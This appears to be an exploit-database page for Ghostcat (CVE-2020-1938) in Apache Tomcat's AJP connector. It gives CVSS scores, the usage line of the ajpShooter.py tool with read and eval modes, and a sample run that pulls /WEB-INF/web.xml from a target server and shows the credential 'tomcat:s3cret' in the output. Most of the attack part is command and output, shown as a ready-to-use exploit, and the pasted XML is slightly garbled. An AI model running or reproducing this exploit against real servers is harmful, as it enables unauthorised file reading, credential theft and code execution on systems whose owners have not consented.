Ghostcat Vulnerability Remote Code Execution

2021.05.05
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: tomcat ajp协议任意属性设置导致的文件读取和文件执行。 # Author: Chaitin Tech # Date: 01.02.2020 # Link: https://github.com/00theway/Ghostcat-CNVD-2020-10487 # CVE: CVE-2020-1938 # Testing and Debugging: Tayfun Akyıldız #Linkedin: https://www.linkedin.com/in/tayfun-akyildiz ajpShooter.py [-h] [--ajp-ip AJP_IP] [-H HEADER] [-X {GET,POST,HEAD,OPTIONS,PROPFIND}] [-d DATA] [-o OUT_FILE] [--debug] url ajp_port target_file {read,eval} - $ python3 ajpShooter.py http://192.168.1.20:8080 8069 /WEB-INF/web.xml read [<] 200 200 [<] Accept-Ranges: bytes [<] ETag: w/ 1250-1666761332000" [<] Last-Modified: Mon, 30 Nov 2020 18:35:32 GMT [<] Content-Type: application/xml [<] Content-Length: 1250 <?xml version="1.0" encoding="UTF-8"?> Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns. jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0" metadata-complete="true"> <display-name>Welcome to Tomcat/display-name> <description> Welcome to Tomcat tomcat:s3cret </description> k/web-app


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top